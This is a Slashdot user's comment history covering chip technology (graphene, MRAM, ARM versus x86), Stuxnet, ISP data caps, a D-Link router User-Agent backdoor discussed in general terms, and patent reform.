Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×

Comment Re:AMD may benefit (Score 1) 59

You're right. Graphene is probably the future. I think so too. If the [zero] bandgap problem can be solved. There was an article on /. recently indicating that somebody had made a breakthrough here. As an interim, graphene might be useful in replacing the copper/aluminum intrachip interconnect.

A graphene processor running at 100GHz would [probably] outperform a 32 core x86. Initially, a graphene chip would probably have far fewer gates. Thus, a true RISC ISA [like ARM] would be the logical choice. It could run x86 in software emulation (e.g. QEMU) and still beat the pants off the best Intel offering. Yum.

As to process/die shrinkage, I, too, have seen the announcements about the end of Moore's Law. They always seem to occur at the same interval of ML [2 years]. I've also seen articles about techniques to extend ML for the foreseeable future. No worries.

The other part of the puzzle is memory bandwidth. Getting a cache miss [no matter how large a cache (e.g. 12 MB)] slows things down to the point where advances in chip computation speed stall on memory transfer.

For that, we'd need a DRAM replacement like magneto-resistive RAM [or ferroelectric RAM]. MRAM has the same cell size as DRAM, retains data without power, and is at least 10x faster than DRAM. L1 cache is pure static RAM [which has active power draw and large footprint]. MRAM is as fast as L2 cache.

Hewlett Packard [which has been taking the lead in MRAM development] has a roadmap for MRAM deployment:
- Replace flash memory [and unlike flash, MRAM doesn't "wear out"]
- Replace DRAM
- Replace/eliminate L2 [and L3] cache
- Put MRAM at the heart of an SOC solution
HP is willing to license the tech to anybody that wants it. Unfortunately, the last announcement of any real progress was a while back.

Comment Re:AMD may benefit (Score 2, Interesting) 59

ARM is starting to encroach on x86 in the server space:
- lower data center power requirements
- they're coming out with a 64 bit version
- ARM has a much smaller die footprint.
Intel must do ARM to stay in that game.

ARM would not be Intel's first foray into alternate architectures for x86 [8080, 8085, 8086, 80186, 80286, 80386, 486, 586, 686]. Remember Itanium [;-)] but also the 432. The Itanium and 432 didn't pan out because [the market for] x86 was so strong, but this indicates that while Intel is wedded to x86, it isn't slavish to it either. They care about making chips at a profit more than they do a given processor architecture. x86 has been a great tool to allow them to do that. But, x86 is just a means to an end for them.

When x86 ceases to be the asset it currently is, Intel will adopt whatever the market demands. The trend for this is ARM (vs. sparc, mips, etc.). At this point, [even] Intel can't kill ARM. ARM has too much demand for it now [it's a better solution for mobile and embedded/hybrid systems and will surpass in the server space in the near future]. Intel is adapting/reacting now, while it has time to do so on its terms instead of waiting 10 years and being forced to do it in a panic.

Contrast this with MS and Windoze. MS lost the mobile space race because of its insistence on Windoze. Intel won't make the same mistake, if for no other reason, they saw what it did to MS.

As to MS, most likely, in 10 years, we'll see MS/Office running on OSX/iOS, Linux, and Android with Windows just a fond memory.

Long term, Intel must become a foundry because it will lose its process generation edge (e.g. 22nm->14nm, but after 6(?)nm there isn't much room left. Others will catch up).

Intel will make money on this. In the mid 80's, Intel was selling its first generation 386 chip for $750. An Intel engineer told me that the same chip was designed to be profitable even if it sold [had to be sold] for $35.

Comment AMD may benefit (Score 2, Interesting) 59

This forces Global Foundries to be more competitive with Intel, which benefits AMD.

GF, TMSC, etc. have been riding the [profitable] curve of being a generation back. That is, Intel is always a generation [or two] ahead, but also incurs significant R&D costs to do so. The competitors could wait and get the same results for far less investment in R&D. They could do this because Intel wasn't competing with them [by producing ASIC's, FPGA's, etc.]

This forces the non-Intel foundries to produce cutting edge stuff sooner. AMD was a big chagrined after spinning off GF and seeing it fall back into the TMSC model [making AMD less competitive against Intel].

The benefit for Intel is trifold:
- More ROI for their expensive fabs. Previously, costs were always recovered because the PC market was always expanding. With this now shrinking, a nextgen Intel fab may need to do piece work to stay profitable.
- Forcing the competition to compete head on [with the increased costs of being first generation], weakening them in the process [pun intended].
- A toe-in-the-water with ARM and mobile space [Atom notwithstanding] as a hedge against x86 arch going the way of the dinosaurs [without the stigma to x86 of a full fledged announcement of direct ARM support].

Comment Re:Interesting quote (Score 1) 46

I think "low yield" was referring to the nature of the over-pressure attack (vs. the rotor speed attack). Or, that things could have been orchestrated to damage/disable all centrifuges at one time [which would have been detected] instead of just increasing the failure rate [which, as Langner pointed out, would confuse/confound the Iranian engineers].

Langner talks a lot about avoiding detection circa 2007 but that being less of a concern in 2009 [e.g. "now that the program has achieved its objectives, let's shock the world with our cyber attack prowess"].

But, perhaps "uproar" was/became a desired result of Stuxnet. I recently got an email from my local congressman regarding defense against cyber warfare.

So, Stuxnet set back the Iranian program a bit. But, it also got Congress thinking about [read: funding] cyber warfare defense [offense is implied].

"Cyber warfare" [although, perhaps, a legitimate concern in the wake of Stuxnet] also becomes the "bogeyman under the bed" that could provide public justification for more NSA-like intrusion/trickery.

Comment Re:Thanks Google (Score 5, Informative) 249

Sounds like you're logged into gmail when you go to youtube.

Logout [of gmail] first [possibly clearing some cookies] and you'll have no problem. I have a gmail account [but I only access it through POP3/IMAP from thunderbird--thus, it's never logged in] and I don't have the same problem. I did have the same problem one time when I was logged into gmail.

If you'd rather not logout/login on gmail repeatedly, you can create a separate browser profile [Firefox, at least] for youtube, etc.

Comment Can this be used for graphene semiconductors? (Score 1, Interesting) 42

The article mentions that one can change the bandgap of a material with the laser. Isn't this what has been holding back graphene semiconductors--that they have a zero bandgap? Could this technique be used to produce practical graphene semiconductors?

Comment Re:Datacaps anyone? (Score 1) 140

Yes. Just artificially dropping some packets (either deliberately or just to implement some notion of quality-of-service) can be problematic. While an established TCP socket can deal with this, doing a DNS lookup [which is datagram based] can be severely affected. My ISP implements QoS and most of the delay I experience is a failed DNS query that must timeout and be retried (e.g. I'll wait a minute to get a page load but 55 seconds of that is waiting for the DNS request to succeed).

It's a way to censor things without doing outright censorship (e.g. blocking Google 100%). It's my belief that when Google was negotiating with the Chinese government about access, they argued strenuously, but in the end, they took the best deal they could get [were offered]. I mean, if Google had taken a stronger stance (e.g. "we won't limit access"), what would the government's response have been (e.g. 100% blockage) and what would the Chinese people's response have been?

Rest assured that your government's artificial push for Baidu was known here in the US, not that we've been able to do much to help. Our government people do talk with Chinese officials about such things [and many more], but your government is usually quite stoic in its responses ;-).

Economic freedom and political freedom are two sides of the same coin. You can't really have one without the other. Note that I'm not talking about capitalism per se. Many European countries have a modified form of socialism, but still have a government that fosters political freedom.

Hopefully, Google's initiative will provide some improvement/relief. Time will tell.

Comment Datacaps anyone? (Score 1) 140

Seems to me the limiting factor will be ISP datacaps.

The ISPs that tend to have them are the ones that also want to send content (e.g. U-Verse, Comcast, to name a few). Datacaps limit peer-to-peer networks.

A more sinister interpretation is that datacaps limit the amount of traffic that the NSA has to sift through. The ISPs that seem to have the greatest track record of caving to NSLs, etc. are also the ones with datacaps. Coincidence?

Thus, datacaps also apply when one's "friend" routes traffic through one's connection to support a distributed VPN scheme.

Comment Re:Will this stupidity ever end? (Score 1) 228

One of the comments in the original article ["Julian"] claims to have the router and have verified it.

It's not hard to verify it. Create a perl/python/whatever program [on a PC] that mimics the "User-Agent:" string and tries to do something that would be password challenged otherwise. If it succeeds, the access method exists [and is exploitable--from the local LAN if nowhere else].

What isn't clear is whether the User-Agent: hack can be used from the router's public IP address vs. just 192.168.x.y [local LAN] or even if 192.168.x.y can be used.

Someone else posted that the hack is used by firmware programs running inside the router to change configuration [which is legitimate for them to do] by sending the browser inside the router the request. So, it seems the intent of this was less of a backdoor (e.g. where D-Link et. al. could remotely take control of the router) and more of a way for the router to do its job.

The fact that the User-Agent: string is a funky, password-like string vs "internal_legitimate_request" indicates that the code author knew it could be exposed to the public/LAN IP addresses and tried to [weakly] mitigate this. The weakness is akin to disassembling code for a shared secret key.

A better way might be to add an additional restriction that such internal requests must also be from a known internal source (e.g. an AF_UNIX [vs. AF_INET] socket that presumeably could not be faked from an external source). But, this would take more time-to-code, sophistication, code space. Perhaps deemed not worth it for a $100 router.

Comment Re:Sure, it's good today (Score 1) 415

Lament the hobbling of innovation by an incompetent patent office.

Agreed.

But, in fairness to them, it isn't just competence, but also they're [very] understaffed. They have a [huge] backlog which they've been tasked [by Congress?] with reducing. Unfortunately, if they deny a patent, the inventor may refile. Deny again and refile again, ... The only way for them to truly clear the backlog is to approve the patent. This kicks frivolous patents into the court system--which may have less expertise but more resources [jury pools, appellate courts, etc.]. Not the right thing to do, but possibly understandable.

I have some hope for the "America Invents Act". This makes it easier for interested third parties to dig up prior art and submit it to the USPTO and trigger a reexamination. Crowdsourcing by experts in a given field may help stem the tide. But, further legislation is probably required (e.g. outlawing software patents). And, I say this as a programmer.

With some poetic justice/irony, Apple has lost its iOS "rubber banding" patent in the EU due to a recent German court decision [was reported on Slashdot, I believe]. This is because Steve Jobs demonstrated the rubber banding feature at at a conference and said "Boy, have we got it patented". The actual patent application was dated a few months later. Unfortunately, while this is okay in the US, in the EU such a [public] disclosure before the patent is filed nullifies the patent [Steve's talk is considered prior art].

Slashdot Top Deals

Thus spake the master programmer: "After three days without programming, life becomes meaningless." -- Geoffrey James, "The Tao of Programming"

Working...